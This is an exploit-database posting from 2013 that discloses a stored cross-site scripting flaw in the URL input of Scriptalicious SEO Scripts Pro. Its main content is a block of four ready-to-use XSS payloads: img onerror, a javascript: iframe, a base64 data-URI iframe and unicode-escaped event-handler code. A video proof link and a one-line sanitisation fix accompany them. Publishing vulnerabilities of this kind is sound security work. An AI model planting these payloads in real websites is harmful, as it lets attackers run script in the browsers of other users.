Home / exploits Scriptalicious Pro Cross Site Scripting
Posted on 04 June 2013
Exploit Title: Scriptalicious Pro Cross Site Scripting # Date: 06/01/2013 # Author: Nikhalesh Singh Bhadoria # Twitter: @nikhaleshsingh #Download Link: scriptalicious.com # Versions Affected: All # Category:Xss ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Description: The url input in Scriptalicious SEO Scripts Pro is not sanitized. Therefore it results in a stored cross-site scripting. POC: http://www.youtube.com/watch?v=EFVtRLJ56L8&feature=youtu.be Code :- ######################################################################################################## "><img src=x onerror=prompt(0);> <iframe %00 src="	javascript:prompt(1)	"%00> <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <form><textarea onkeyup='u0061u006Cu0065u0072u0074(1)'> ########################################################################################################## Fix: Better sanitization by restricting special characters. Regard's Nikhalesh Singh Bhadoria Information Security Enthusiast Website:Gurunsb.com
